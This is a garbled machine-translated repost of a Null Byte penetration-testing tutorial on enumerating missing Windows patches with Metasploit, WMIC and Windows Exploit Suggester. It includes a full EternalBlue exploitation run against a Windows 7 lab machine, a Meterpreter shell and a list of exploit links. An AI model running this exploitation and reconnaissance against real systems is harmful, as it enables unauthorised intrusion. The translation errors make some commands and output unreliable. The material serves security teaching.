قالب وردپرس درنا توس
Home / Tips and Tricks / Identifying Missing Windows Patches for Easier Utilization «Null Byte :: WonderHowTo

Identifying Missing Windows Patches for Easier Utilization «Null Byte :: WonderHowTo



No operating system is faced with as many vulnerabilities as Windows, and it is often a race to publish the latest patches to fix problems. From an attacker's point of view, knowing what patches are present on a Windows computer can cause or prevent successful exploitation. Today we'll cover three methods of patch enumeration with Metasploit, WMIC, and Windows Exploit Suggester.

For metasploit we will use a post module to find missing patches. With WMIC, we execute commands directly from a shell on the system to display technical patches for quick troubleshooting. With Windows Exploit Suggester, we compare the patches installed on the system with a database of vulnerabilities. We will use Kali Linux to attack an unpatched version of Windows 7.

Method 1
: Metasploit

The first method we use to identify missing patches on the target is metasploit. Start it by entering msfconsole in the terminal .

  ~ # msfconsole

[-] *** The Metasploit Framework Console ... /
[-] * WARNING: No database support: No database YAML file
[-]

, ,
,

dBBBBBBb dBBBP dBBBBBP dBBBBb. O
& # 39; dB & # 39; BBP
dB & # 39; dB & # 39; dB & # 39; dBBP dBP dBP BB
dB # dB # dBP dBP dBP BB
dB # dB # dB # dBBBBP dBP dBBBBBB

dBBBBBP dBBBBBb dBP dBBBP dBP dBBBBBP
, , dB & # 39; dBP dB & # 39; .BP
| dBP dBBBB & # 39; dBP dB & # 39; .BP dBP dBP
- -o- dBP dBP dBP dB & # 39; .BP dBP dBP
| dBBBBP dBP dBBBBP dBBBP dBP dBP

,
,
o Brave to go where no
Shell has gone before

= [ metasploit v5.0.20-dev                          ]
+ - - = [ 1886 exploits - 1065 auxiliary - 328 post       ]
+ - - = [ 546 payloads - 44 encoders - 10 nops            ]
+ - - = [ 2 evasion                                       ]

msf5> 

We need to compromise the machine and get a meterpreter session to run the post module. Since we know that this is an unpatched version of Windows 7, we can quickly exploit it with EternalBlue.

Load the module with the command use :

  msf5> use exploit / windows / smb / ms17_010_eternalblue 

Set the appropriate options and type run to start the exploit: Run

  msf5 exploit (windows / smb / ms17_010_eternalblue)>

[*] The reverse TCP handler was started on 10.10.0.1:1337
[+] 10.10.0.104:445 - Host is likely to be vulnerable to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.0.104:445 - Connect to the target for exploitation.
[+] 10.10.0.104:445 - Connection made for utilization.
[+] 10.10.0.104:445 - The selected target operating system is valid for the operating system specified by the SMB response
[*] 10.10.0.104:445 - CORE raw buffer dump (42 bytes)
[*] 10.10.0.104:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes
[*] 10.10.0.104:445 - 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76 sional 7601 Serv
[*] 10.10.0.104:445 - 0x00000020 69 63 65 20 50 61 63 6b 20 31 Ice pack 1
[+] 10.10.0.104:445 - Target arc selected, valid for the arc specified by the DCE / RPC response
[*] 10.10.0.104:445 - Try Exploit with 12 Groom Allocations.
[*] 10.10.0.104:445 - All but the last fragment of an exploit package will be sent
[*] 10.10.0.104:445 - Start non-paged pool maintenance
[+] 10.10.0.104:445 - Sending SMBv2 buffers
[+] 10.10.0.104:445 - Close the SMBv1 connection, creating a free hole next to the SMBv2 buffer.
[*] 10.10.0.104:445 - Sending the last SMBv2 buffer.
[*] 10.10.0.104:445 - Last fragment of an exploit package is sent!
[*] 10.10.0.104:445 - Response from the exploit package is received
[+] 10.10.0.104:445 - ETERNALBLUE override successfully completed (0xC000000D)!
[*] 10.10.0.104:445 - Send the egg to a damaged connection.
[*] 10.10.0.104:445 - Trigger without damaged buffer.
[*] Transmission level (206403 bytes) to 10.10.0.104
[*] The Meter Session 1 was opened on 2019-10-27 12:28:32 -0500 (10.10.0.1:1337 -> 10.10.0.104:49228)
[+] 10.10.0.104:445 - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - =
[+] 10.10.0.104:445 - = - = - = - = - = - = - = - = - = - = - = - = - = - WIN - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - =
[+] 10.10.0.104:445 - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - =

meterpreter> 

We now have a Meterpreter session on the target. Because post-modules are running in the background in an existing session, you must first run our session in the background:

  meterpreter> background

[*] Background session 1 ... 

Then we can load the module with the command use :

  msf5 exploit (windows / smb / ms17_010_eternalblue)> use post / windows / gather / enum_patches [19659006] When you type  options  at the command prompt, Metasploit displays all available options and settings for the current module: 

  msf5 post (windows / gather / enum_patches)> options

Module options (post / windows / gather / enum_patches):

Name Current setting Required Description
---- --------------- -------- -----------
KB KB2871997, KB2928120 yes A comma-separated list of KB patches to find
MSFLOCALS true yes Search for missing patches for which a local MSF module exists
SESSION yes The session on which to run this module. 

We only need to set the session number on which to run this module. We could specify a comma-separated list of additional patches to look for, but right now the default patches work just fine.

Use the command set to set the number of the patch session is running in the background:

  msf5 post (windows / gather / enum_patches)> set session 1

session => 1 

And at the beginning, enter run :

  msf5 post (windows / gather / enum_patches)> run

[+] KB2871997 is missing
[+] KB2928120 is missing
[+] KB977165 - May be vulnerable to MS10-015 kitrap0d when Windows 2K SP4 - Windows 7 (x86)
[+] KB2305420 - May be vulnerable to MS10-092 Schelevator on Vista, 7, and 2008
[+] KB2592799 - May be vulnerable to MS11-080 if XP SP2 / SP3 wins 2k3 SP2
[+] KB2778930 - May be vulnerable to MS13-005 hwnd_broadcast. Increases the integrity of Low to Medium
[+] KB2850851 - May be vulnerable to MS13-053 sloppiness when x86 is Win7 SP0 / SP1
[+] KB2870008 - May be vulnerable to MS13-081 track_popup_menu if x86 is Windows 7 SP0 / SP1
[*] Post-Module Completion Completed 

The first two patches are returned as missing with some additional potential vulnerabilities and patches.

Method 2: WMIC

The Next Method We Will Perform The enumeration of patches uses the Windows WMIC utility . WMIC (Windows Management Instrumentation Command-Line) is a tool that runs WMI operations on Windows. It is used as a kind of prompt and can be run in both interactive and non-interactive modes.

To use this utility, we need a proper shell on the target. Luckily, a meterpreter session is already running so we can use it to drop into a system shell.

Use the sessions command together with the -i flag to interact with this session:

  msf5> sessions -i 1

[*] Start of interaction with 1 ...

meterpreter> 

This should lead us to the prompt of Meterpreter - just enter shell and we will be dropped into a system shell:

  meterpreter> shell

Process 2452 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:  Windows  system32> 

Now we should be able to use the WMIC utility to display all installed patches. At the command prompt, type wmic qfe list to list all QFE (Quick Fix Engineering) patches available on the system:

  C:  Windows  system32> wmic qfe list

wmic qfe list
Caption CSName Description FixComments HotFixID InstallDate InstalledBy InstalledOn Name ServicePackInEffect Status
http://support.microsoft.com/?kbid=2534111 W02 hotfix KB2534111 2/25/2019
http://support.microsoft.com/?kbid=976902 W02 Update KB976902 W02  Administrator Nov 21, 2010 

Specifies the ID, description, installation information, and associated URL of the installed patches. We can also apply full to our command to get a slightly different view of this data:

  C:  Windows  system32> wmic qfe list full

wmic qfe list full

Caption = http: //support.microsoft.com/? Kbid = 2534111
CSName = W02
Description = Hotfix
FixComments =
HotFixID = KB2534111
InstallDate =
InstalledBy =
InstalledOn = 2/25/2019
Name =
ServicePackInEffect =
Status =

Caption = http: //support.microsoft.com/? Kbid = 976902
CSName = W02
Description = Update
FixComments =
HotFixID = KB976902
InstallDate =
InstalledBy = W02  Administrator
InstalledOn = 21.11.2010
Name =
ServicePackInEffect =
Status = 

This method is useful because only a simple shell is required to run WMIC.

Method 3: Windows Exploit Suggester

The last method to identify missing patches is Windows Exploit Suggester. This is a tool written in Python that compares the patches installed on a target with a database of Microsoft vulnerabilities on our local machine.

Windows Exploit Suggester requires the output of systeminfo . from the target to compare it to the database. Since we should still have shell access to our target, we can run the following command:

  C:  Windows  system32> systeminfo

system information

Host name: W02
Name of the operating system: Microsoft Windows 7 Professional
Operating System Version: 6.1.7601 Service Pack 1 Build 7601
Operating system manufacturer: Microsoft Corporation
Operating System Configuration: Member Workstation
Operating system build type: multiprocessor-free
Registered owner: admin2
Registered organization:
Product ID: 00371-868-0000007-85704
Original installation date: 25.02.19, 14.04.46 clock
System start time: 27.10.2013, 13:48:26 clock
System manufacturer: QEMU
System model: standard PC (i440FX + PIIX, 1996)
System type: x64-based PC
Processor (s): 1 processor (s) installed.
[01]: Intel64 Family 15 Model 6 Stepping 1 GenuineIntel ~ 2533 Mhz
BIOS version: SeaBIOS rel-1.11.1-0-g0551a4be2c-prebuilt.qemu-project.org, 4/1/2014
Windows directory: C:  Windows
System directory: C:  Windows  system32
Boot Device:  Device  HarddiskVolume1
System locale: de-de; English (USA)
Input locale: en-us; English (USA)
Time Zone: (UTC-06: 00) Central Time (USA and Canada)
Total physical memory: 2,047 MB
Available physical memory: 1,461 MB
Virtual memory: Max. Size: 4.095 MB
Virtual Memory: Available: 3,494 MB
Virtual memory: In use: 601 MB
Location (s) of the pagefile: C:  pagefile.sys
Domain: dlab.env
Login server: N / A
Hotfix (s): 2 hotfix (s) installed.
[01]: KB2534111
[02]: KB976902
Network card (s): 1 NIC (s) installed.
[01]: Intel (R) PRO / 1000 MT network connection
Connection name: LAN connection
DHCP enabled: Yes
DHCP server: 10.10.0.100
IP address (s)
[01]: 10.10.0.104
[02]: fe80 :: 104: 336c: a632: e39b 

Save the output to a text file on our local machine:

  ~ # cat system_info.txt

Host name: W02
Name of the operating system: Microsoft Windows 7 Professional
Operating System Version: 6.1.7601 Service Pack 1 Build 7601
Operating system manufacturer: Microsoft Corporation
Operating System Configuration: Member Workstation
Operating system build type: multiprocessor-free
Registered owner: admin2
Registered organization:
Product ID: 00371-868-0000007-85704
Original installation date: 25.02.19, 14.04.46 clock
System start time: 27.10.2013, 13:48:26 clock
System manufacturer: QEMU
System model: standard PC (i440FX + PIIX, 1996)
System type: x64-based PC
Processor (s): 1 processor (s) installed.
[01]: Intel64 Family 15 Model 6 Stepping 1 GenuineIntel ~ 2533 Mhz
BIOS version: SeaBIOS rel-1.11.1-0-g0551a4be2c-prebuilt.qemu-project.org, 4/1/2014
Windows directory: C:  Windows
System directory: C:  Windows  system32
Boot Device:  Device  HarddiskVolume1
System locale: de-de; English (USA)
Input locale: en-us; English (USA)
Time Zone: (UTC-06: 00) Central Time (USA and Canada)
Total physical memory: 2,047 MB
Available physical memory: 1,461 MB
Virtual memory: Max. Size: 4.095 MB
Virtual Memory: Available: 3,494 MB
Virtual memory: In use: 601 MB
Location (s) of the pagefile: C:  pagefile.sys
Domain: dlab.env
Login server: N / A
Hotfix (s): 2 hotfix (s) installed.
[01]: KB2534111
[02]: KB976902
Network card (s): 1 NIC (s) installed.
[01]: Intel (R) PRO / 1000 MT network connection
Connection name: LAN connection
DHCP enabled: Yes
DHCP server: 10.10.0.100
IP address (s)
[01]: 10.10.0.104
[02]: fe80 :: 104: 336c: a632: e39b 

Next, we need to download the script from GitHub. The easiest way is with the utility wget :

  ~ # wget https://raw.githubusercontent.com/GDSSecurity/Windows-Exploit-Suggester/master/windows-exploit-suggester. py

--2019-10-27 12: 38: 34-- https://raw.githubusercontent.com/GDSSecurity/Windows-Exploit-Suggester/master/windows-exploit-suggester.py
Raw.githubusercontent.com is resolved (raw.githubusercontent.com) ... 151.101.148.133
Connecting to raw.githubusercontent.com (raw.githubusercontent.com) | 151.101.148.133 |: 443 ... connected.
HTTP request sent, response expected ... 200 OK
Length: 69175 (68K) [text/plain]
Save as: "windows-exploit-suggester.py"

windows-exploit-suggester.py 100% [======================================================================================================================>] 67.55 KB / s in 0.07 s

2019-10-27 12:38:34 (951 KB / s) - & # 39; windows-exploit-suggester.py & # 39; [69175/69175] 

Then install all dependencies, in this case just the python-xlrd package:

  ~ # apt-get install python-xlrd

Read package lists ... Done
Create dependency tree
Status information is read ... Done
The following NEW packages will be installed:
python-xlrd
0 updated, 1 reinstalled, 0 removed and 0 not updated.
Requires 104 kB archives.
After this process, 490K of additional space will be used.
Get: 1 http://kali.download/kali kali-rolling / main amd64 python-xlrd all 1.1.0-1 [104 kB]
104 kB in 1s (144 kB / s)
Selection of the previously unselected package python-xlrd.
(Database is being read ... 408990 Files and directories are currently installed.)
Unpacking is being prepared ... / python-xlrd_1.1.0-1_all.deb ...
Python-xlrd (1.1.0-1) is unpacked ...
Python-xlrd (1.1.0-1) is set up ...
Processing trigger for man-db (2.8.5-2) ... 

After the tool has been set up, we need to generate the Microsoft Security Bulletin database. Windows Exploit Suggester can do this automatically with the command update :

  ~ # python windows-exploit-suggester.py --update

[*] Winsploit Version 3.3 is starting ...
[+] Write to file 2019-10-27-mssb.xls
[*] done 

At this point we should continue. All we have to do is run the tool and specify the previously created System Info file and database file just created:

  ~ # python windows-exploit-suggester.py --database 2019-10-27-mssb. xls --systeminfo system_info.txt

[*] Winsploit Version 3.3 is starting ...
[*] Database file detected as xls or xlsx based on the extension
[*] Attempting to read from the system info input file 

The script executes and returns all the patches missing on our target along with the relevant information and links:

  [+] Successfully read system info input file (ASCII) )
[*] Query database file for potential security vulnerabilities
[*] Compare the two hotfixes with the 386 potential bulletins with a database of 137 known exploits
[*] there are now 386 remaining vulnerabilities
[+] [E]   Exploitdb PoC, [M] Metasploit Module, [*] Missing Bulletin
[+] Windows version named "Windows 7 SP1 64-bit"
[*]
[E]   MS16-135: Security Update for Windows Kernel-Mode Driver (3199135) - Important
[*] https://www.exploit-db.com/exploits/40745/ - Microsoft Windows Kernel - win32k Denial of Service (MS16-135)
[*] https://www.exploit-db.com/exploits/41015/ - Microsoft Windows kernel - & win32k.sys & # 39; & # 39; # 39 & NtSetWindowLongPtr; - extended rights (MS16-135) (2)
[*] https://github.com/tinysec/public/tree/master/CVE-2016-7255
[*]
[E]   MS16-098: Security Update for Windows Kernel-Mode Driver (3178466) - Important
[*] https://www.exploit-db.com/exploits/41020/ - Microsoft Windows 8.1 (x64) - RGNOBJ Integer Overflow (MS16-098)
[*]
[M]   MS16-075: Security Update for Windows SMB Server (3164038) - Important
[*] https://github.com/foxglovesec/RottenPotato
[*] https://github.com/Kevin-Robertson/Tater
[*] https://bugs.chromium.org/p/project-zero/issues/detail?id=222 - Windows: Increasing permissions through local WebDAV NTLM reflection
[*] https://foxglovesecurity.com/2016/01/16/hot-potato/ - Hot Potato - Windows extended rights
[*]
[E]   MS16-074: Microsoft Graphics Component Security Update (3164036) - Important
[*] https://www.exploit-db.com/exploits/39990/ - Windows - gdi32.dll Multiple DIB-Related EMF Record Handlers Heap-based Reads / Memory Release (MS16-074) PoC
[*] https://www.exploit-db.com/exploits/39991/ - Windows Kernel - ATMFD.DLL NamedEscape 0x250C Pool Corruption (MS16-074), PoC
[*]
[E]   MS16-063: Cumulative Security Update for Internet Explorer (3163649) - Critical
[*] https://www.exploit-db.com/exploits/39994/ - Internet Explorer 11 - Garbage Collector attribute types confusion (MS16-063), PoC
[*]
[E]   MS16-059: Security Update for Windows Media Center (3150220) - Important
[*] https://www.exploit-db.com/exploits/39805/ - Microsoft Windows Media Center - Remote Code Execution for Processing .MCL Files (MS16-059), PoC
[*]
[E]   MS16-056: Security Update for Windows Journal (3156761) - Critical
[*] https://www.exploit-db.com/exploits/40881/ - Microsoft Internet Explorer - JavaScriptStackWalker memory corruption in jscript9 (MS15-056)
[*] http://blog.skylined.nl/20161206001.html - MSIE jscript9 JavaScriptStackWalker memory corruption

...

[M] MS14-012: Cumulative Security Update for Internet Explorer (2925418) - Critical
[M] MS14-009: Vulnerabilities in .NET Framework Could Allow Elevation of Privilege (2916607) - Important
[E] MS13-101: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (2880430) - Important
[M] MS13-097: Cumulative Security Update for Internet Explorer (2898785) - Critical
[M] MS13-090: Cumulative Security Update for ActiveX Kill Bits (2900986) - Critical
[M] MS13-080: Cumulative Security Update for Internet Explorer (2879017) - Critical
[M] MS13-069: Cumulative Security Update for Internet Explorer (2870699) - Critical
[M] MS13-059: Cumulative Security Update for Internet Explorer (2862772) - Critical
[M] MS13-055: Cumulative Security Update for Internet Explorer (2846071) - Critical
[M] MS13-053: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Remote Code Execution (2850851) - Critical
[M] MS13-009: Cumulative Security Update for Internet Explorer (2792100) - Critical
[M] MS13-005: Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of Privilege (2778930) - Important
[E] MS12-037: Cumulative Security Update for Internet Explorer (2699988) - Critical
[*] http://www.exploit-db.com/exploits/35273/ - Internet Explorer 8 - Fixed Column ID for ASLR, DEP & EMET 5., PoC
[*] http://www.exploit-db.com/exploits/34815/ - Internet Explorer 8 - Fixed Column ID for ASLR, DEP & EMET 5.0 Bypass (MS12-037), PoC
[*]
[*]   done 

This method may be the most thorough because we use an updated database of patches to compare it with the target. It also has the advantage that it can be run remotely.

Summary

In this tutorial, we looked at a few ways to detect missing patches on a Windows computer. First, we used a Metasploit Post module, followed by the WMIC utility on Windows, and finally the Windows Exploit Suggester Python script. Enumerating patches is extremely important when attacking Windows because it limits the number of potential exploits, saves time and generally simplifies the work. 19659064] Cover picture of Breakingpic / Pexels; Screenshots of drd_ / zero byte


Source link